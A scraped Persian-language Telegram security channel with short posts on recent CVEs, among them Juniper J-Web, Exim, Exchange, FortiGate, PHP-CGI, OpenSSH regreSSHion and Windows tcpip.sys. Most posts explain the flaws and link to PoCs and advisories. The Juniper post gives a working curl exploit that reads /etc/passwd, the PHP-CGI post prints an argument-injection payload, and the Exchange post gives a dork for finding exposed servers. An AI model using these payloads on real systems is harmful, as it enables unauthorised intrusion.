Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
List of all available and newest CVEs (Common Vulnerabilities and Exposures) with links to their PoC (proof of concept).

Data since 1999 (!)


فهرستی از تمامی CVE های موجود و جدید
داده ها از سال 1999 (!)

https://github.com/trickest/cve

#SOC
#CVE
@Engineer_Computer
⭕️Juniper Web Device Manager - RCE
CVE-2023-36845


curl "https://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST

Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu

#CVE #Juniper
@Engineer_Computer
⭕️ آسیب پذیری با شناسه ثبت شده CVE-2023-42115 که برای Exim اومده میلیون ها سرور آسیب پذیر که منجر به هک شدن توسط این آسیب پذیری میشه داره.
آسیب پذیری RCE کشف شده فعلا واسش حتی Patch هم نیومده و یا باید دسترسی به سرور رو محدود کرد یا سرور رو خاموش کرد:)
⭕️ نکته مهم :
تصویر ضمیمه شده تعداد بالای آسیب پذیریهای ایران رو نشون میده و باید بزودی منتظر هک شدن کل ایران باشم.


https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/

#0day #Exim #attack #cve

@Engineer_Computer
🚨CVE-2024-21410: 0day in MS Exchange, 9.8 rating 🔥


آسیب پذیری CVE-2024-21410 یک آسیب پذیری critical است که سرور Microsoft Exchange را تحت تأثیر قرار می دهد.
این آسیب پذیری به مهاجم اجازه می‌دهد تا با انتقال هش‌های NTLM، که برای رمزهای عبور encrypted شده برای احراز هویت استفاده می‌شود، هویت هر کاربر را در سرور Exchange جعل کند که می تواند منجر به دسترسی غیرمجاز، سرقت داده یا privilege escalation شود.

برای سوء استفاده از این آسیب‌پذیری، مهاجم باید به هش‌های NTLM یک کاربر معتبر دسترسی داشته باشد که می‌توان آن را با روش‌های مختلفی مانند فیشینگ، اسنیفینگ شبکه یا credential dumping به دست آورد.

Search at Netlas.io:
👉🏻 Link: https://nt.ls/pR4S2
👉🏻 Dork: tag.name:"microsoft_exchange"

Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410

#cve #vulenrability
@Engineer_Computer
🦠CVE-2024-1403🦠

🛑 برای محصول OpenEdge Authentication Gateway و AdminServer آسیب پذیری با کد شناسایی CVE-2024-1403 منتشر شده است .

هنگامی که احراز هویت OpenEdge (OEAG) با یک دامنه OpenEdge پیکربندی می شود که از احراز هویت لوکال سیستم عامل برای تاییدیه ورود استفاده میکند ، یک آسیب پذیری در حین احراز هویت میتواند منجر به دسترسی غیرمجاز و احراز نشده شود.

به طور مشابه، هنگامی که یک اتصال AdminServer توسط OpenEdge Explorer (OEE) و OpenEdge Management (OEM) ایجاد شود، و از احراز هویت لوکال سیستم عامل استفاده کند، میتواند منجر به دسترسی غیرمجاز و ورود به سیستم شود.

ورژن های 11.7.18 و قبل از آن و 12.2.13 و قبل از آن و ورژن 12.8.0 دارای این آسیب پذیری می باشند.

⚠️ https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive/

🦠 https://github.com/horizon3ai/CVE-2024-1403

#POC
#CVE

@Engineer_Computer
#FortiGate #RCE #CVE-2024-21762
یکی از محصولات شرکت Fortinet که تولید کننده محصولات امنیت سایبری است، با نام FortiGate SSL VPN دارای یک آسیب پذیری باینری بوده که امکان اجرای کد از راه دور را میدهد.

نوع آسیب پذیری out-of-bounds write است به معنی نوشتن خارج از فرایند اجرای اصلی برنامه، که پیش از احراز امکان رخداد دارد.

مشکل در توابع Parser پروتکل HTTP  است که بواسطه دریافت نوع داده مخرب، فرایند تخریب حافظه اتفاق می افتد، این نوع داده مخرب در Header با نام Chunked است که یک Transfer Encoding محسوب میشود، در توابع پارسر پروتکل.

یک حلقه while وجود دارد که  در صورت تایید شرط مبنی بر کوچکتر بودن مقدار iVar3 از 1 ، param_1 مقدار دهی میشود و در مرحله بعد مقدار در تابع FUN_01707e10__ap_getline فراخوانی خواهد شد.

در انتهای مقدار Header کاراکتر های 0x0d و 0x0a را write میکند تا کاراکتر های CRLF را در لایه نرم افزار اعمال کند، اما با قرار دادن مقدار 0 برای طول کاراکتر chunked ، یک حلقه while اجرا میشود که مقدار param_1 را + 1 کرده و نهایتا در bVar2 میریزد.
@Engineer_Computer
#Argument_Injection #RCE on #PHP-CGI #CVE-2024-4577
اخیرا Orange Tsai یک آسیب پذیری کشف نموده، از PHP-CGI زبان PHP از نسخه 8.1 تا 8.3 را در XAMPP ویندوز تحت تاثیر قرار میدهد.

این آسیب پذیری در پیکربندی های PHP-CGI است در برنامه XAMPP، که مهاجم با ارسال یک فرمان اجرایی به پارامتر:

/cgi-bin/php-cgi.exe?d+allow_url_include=1+d+auto_prepend_file=php://input

و نقطه انتهایی php-cgi.exe که موجبات اجرای wrapper مربوط به php را فراهم نبوده و مهاجم میتواند کد سمت سرور را با روش POST ارسال کرده و اجرا کند.

نکته جالب این آسیب پذیری، Initialize کردن PHP-CGI برای مجاز کردن فرایند دریافت کد سمت سرور از URL را خود انجام داده و نهایتا با Wrapper مربوط به PHP اقدام به اجرای کد میکند.

https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html

@Engineer_Computer
#regreSSHion #OpenSSH #CVE-2024-6387
اخیرا برنامه OpenSSH که استفاده گسترده ای در پروتکل SSH دارد، دارای یک آسیب پذیری شرایط رقابتی یا Race Condition شده است.

این آسیب پذیری از نسخه 8.5p1 => 9.8p1 که در برابر signal handler آسیب پذیری Race Condition رخ خواهد داد، که به زبان ساده میشود اینکه در یک بازه زمانی مشخص، چندین Thread موازی تلاش میکنند در یک منطقه حافظه برخی فرایند خواندن و برخی فرایند نوشتن را انجام دهند.

اینجا تقدم و تأخر لحظه استفاده و لحظه چک بهم خواهد خورد و آسیب پذیری این امکان رو خواهد داد که شما از 200 درخواست یا Request ارسالی چند مورد رو به اشتباه مجوز تایید بگیرید.

خب حالا نحوه رخداد آسیب پذیری چطور بوده؟ این آسیب پذیری بر روی سیستم عامل های لینوکسی که از کتابخونه glibc بهره میگیرند، قابل بهره برداری است.

چرا که تابع syslog خود تابع async-signal-unsafe را فراخوانی میکند که این تابع از malloc و free برای تخصیص حافظه استفاده میکند که در منطقه سیستم است لذا سطح دسترسی نیز root خواهد بود، همچنین در تابع main_sigchld_handler شرط آسیب قرار دارد.

@Engineer_Computer
The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380)
@Engineer_Computer
Hardware Security
PKfail Research Report 2024.
https://www.binarly.io/blog/pkfail-u

@Engineer_Computer

——————————————————
#CyberSecurity #Hardware #CVE
#SecureBusinessContinuity
#CVE-2024-38063 #Integer_Overflow on tcpip.sys
اخیرا آسیب پذیری ای ثبت شد در پروتکل TCP/IP که از نوع Integer Overflow و Integer Underflow بود به معنی سر ریز عددی یک ورودی عددی.

این آسیب پذیری در فرایند Fragmentation و Reassemble کردن تکه های بسته پروتکل IPv6 قرار داشت که محققین با بررسی این فرایند متوجه شدند در زمانی که ساختار بسته IPv6 تکه تکه میشوند، آخرین بسته با تاخیر 60 ثانیه ای تحویل Parser گیرنده داده میشود.

این تاخیر 60 ثانیه ای تابعی با نام Ipv6pReassemblyTimeout را فراخوانی کرده که این تابع بسته ها را drop میکند، همچنین به فیلد More میبایست مقدار 0 بگیرد تا اعلام کند آخرین بسته است.

اینجا در تصویر Disassemble شده کد سی پلاس، اگر دقت کنید ثبات edx که یک اشاره گر به rdi+68h داخلش انتقال داده شده، در ادامه در نوع داده dx خودش که میشود 16 بیتی، مقادیر 8 و r15+8 اضافه میشود.

اینجا اگر مقدار packet_length برابر با 0xFFD0 باشد و بعد مقدار 8 بایت بهش اضافه شود، مقدار 0xFFD8 میشود، حالا اگر مقدار net_buffer_length بیشتر از 0x27 باشد، مثلا 39 بایت، اینجا ثبات DX سر ریز عددی خواهد کرد.

@Engineer_Computer